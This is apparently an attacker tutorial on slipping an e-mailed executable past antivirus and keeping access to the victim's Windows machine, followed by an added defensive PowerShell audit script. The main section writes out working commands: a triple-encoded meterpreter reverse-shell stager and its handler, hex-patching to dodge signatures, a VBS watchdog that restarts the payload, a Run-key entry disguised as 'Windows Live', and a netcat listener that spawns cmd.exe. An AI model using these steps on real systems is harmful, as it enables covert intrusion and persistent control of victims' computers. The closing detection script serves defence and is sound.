This article describes the technique attackers use to get past antivirus products. The end result is a file (in this case an executable) that is sent by e-mail to the victim.

A caveat before the steps: stacked msfencode passes, shikata_ga_nai in particular, have been signatured by most engines for years, and msfpayload/msfencode were removed from Metasploit in 2015 in favour of msfvenom. Read this as a description of the pattern (multi-pass encoding, binary patching, a watchdog script plus a Run key), not as a guarantee of evasion against current products.

Step 1) Build the stager and encode it three times in a row, ending with a PE wrapper:

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /root/test.exe

Step 2) msfconsole

Step 3) use multi/handler

Step 4) set payload windows/meterpreter/reverse_tcp

Step 5) set lport 443

Step 6) set lhost 192.168.0.15

Step 7) exploit

Step 8) Use Xenocode Postbuild for .NET to obfuscate the code. Note that Postbuild obfuscates .NET assemblies, so this step only applies if the stager is wrapped in a .NET executable; the PE produced by msfencode in step 1 is native code, not a .NET assembly.

Step 9) Use a hex editor to patch out the byte sequences that signature-based scanners flag (what the author calls the dangerous syscalls).

Step 10) MAINTAIN ACCESS: in the meterpreter session, use mkdir to create a directory on the target.

Step 11) Upload two files into that directory: test.exe (the stager, left running as a background process) and a persist.vbs watchdog that polls the process list through WMI every five seconds and restarts test.exe whenever it is not running:

    state = 1
    While state = 1
        Set WshShell = WScript.CreateObject("WScript.Shell")
        ' Ask WMI for the current process list
        Set colProcessList = GetObject("winmgmts:").ExecQuery("Select * from Win32_Process")
        vFound = False
        For Each objProcess In colProcessList
            ' Compare case-insensitively: VBScript "=" on strings is case-sensitive
            If LCase(objProcess.Name) = "test.exe" Then
                vFound = True
            End If
        Next
        If vFound = True Then
            WScript.Sleep 5000
        Else
            ' Not running: start it again, then wait before the next check
            WshShell.Run "C:\<path where you deployed the files>\test.exe"
            WScript.Sleep 5000
        End If
    Wend

Step 12) Enumerate the Run key on the target (the meterpreter reg command takes -k for the key path, -v for the value name and -d for the data):

    reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

(or HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run; writing under HKLM needs administrative rights, HKCU only needs the current user.)

Step 13) Add the new value to the Run key. Quote the value name, since it contains a space:

    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v "Windows Live" -d "C:\path\test.exe"

(use HKCU instead of HKLM where you do not have administrative rights). If you want to use netcat instead of the Metasploit stager, point the value at a listener that spawns a shell; -L makes the Windows build listen again after each disconnect, -d detaches it from the console:

    C:\\path\\nc.exe -L -d -p 443 -e cmd.exe

Step 14) ENJOY :-) GAME OVER!

Luca
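The persistence set up in steps 11 to 13 is also easy to spot from the defender's side. The following PowerShell script is an added example and not part of the original article: it walks the Run and RunOnce keys under HKLM and HKCU, flags values whose target lives outside Program Files or the Windows directory, is missing, is unsigned, or is a netcat command line with -e, and then lists every wscript.exe/cscript.exe process whose command line references a .vbs file, which is what the persist.vbs watchdog looks like in the process list. The set of trusted directories, the function names and the output format are my own choices.

```powershell
# Added example (not from the original article): audit a Windows host for
# the Run-key + VBS-watchdog persistence pattern described above.
# Run from an elevated prompt so the HKLM keys and all processes are visible.

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumption: autostart binaries are normally expected under these roots.
$trustedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Get-ExePathFromCommand {
    # Pull the executable path out of a Run value such as
    #   "C:\path\nc.exe" -L -d -p 443 -e cmd.exe     or     C:\path\test.exe
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(\S+)')     { return $Matches[1] }
    return $Command
}

function Test-RunEntry {
    # Returns one object per Run value with the reasons it looks suspicious.
    param([string]$Name, [string]$Command)
    $exe = Get-ExePathFromCommand $Command
    $reasons = @()

    $inTrusted = $false
    foreach ($root in $trustedRoots) {
        if ($exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
    }
    if (-not $inTrusted) { $reasons += 'outside Program Files / Windows' }

    if (-not (Test-Path -LiteralPath $exe)) {
        $reasons += 'target missing'
    } else {
        # An msfencode-built test.exe carries no Authenticode signature.
        $sig = Get-AuthenticodeSignature -FilePath $exe
        if ($sig.Status -ne 'Valid') { $reasons += "signature $($sig.Status)" }
    }

    # nc.exe with -e is the listener-spawns-cmd.exe variant from step 13.
    if ($Command -match '(?i)\bnc(64)?\.exe\b.*\s-e\s') { $reasons += 'netcat -e shell' }

    [pscustomobject]@{
        Name       = $Name
        Command    = $Command
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join '; ')
    }
}

# 1. Run / RunOnce values that look out of place
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Get-ItemProperty adds PSPath/PSParentPath/... metadata; skip it.
        if ($p.Name -like 'PS*') { continue }
        $r = Test-RunEntry -Name "$key\$($p.Name)" -Command ([string]$p.Value)
        if ($r.Suspicious) { $r }
    }
}

# 2. Script-host processes running a .vbs (how persist.vbs shows up)
Get-CimInstance Win32_Process |
    Where-Object { $_.Name -in 'wscript.exe', 'cscript.exe' -and $_.CommandLine -match '\.vbs' } |
    Select-Object ProcessId, ParentProcessId, Name, CommandLine
```

HKCU only covers the account the script runs as; to audit every profile on the box, load the other users' hives (or walk HKU:) and add their Run keys to $runKeys. A Run value named "Windows Live" pointing at an unsigned binary outside Program Files, together with a long-lived wscript.exe whose parent has already exited, is exactly the footprint steps 11 to 13 leave behind.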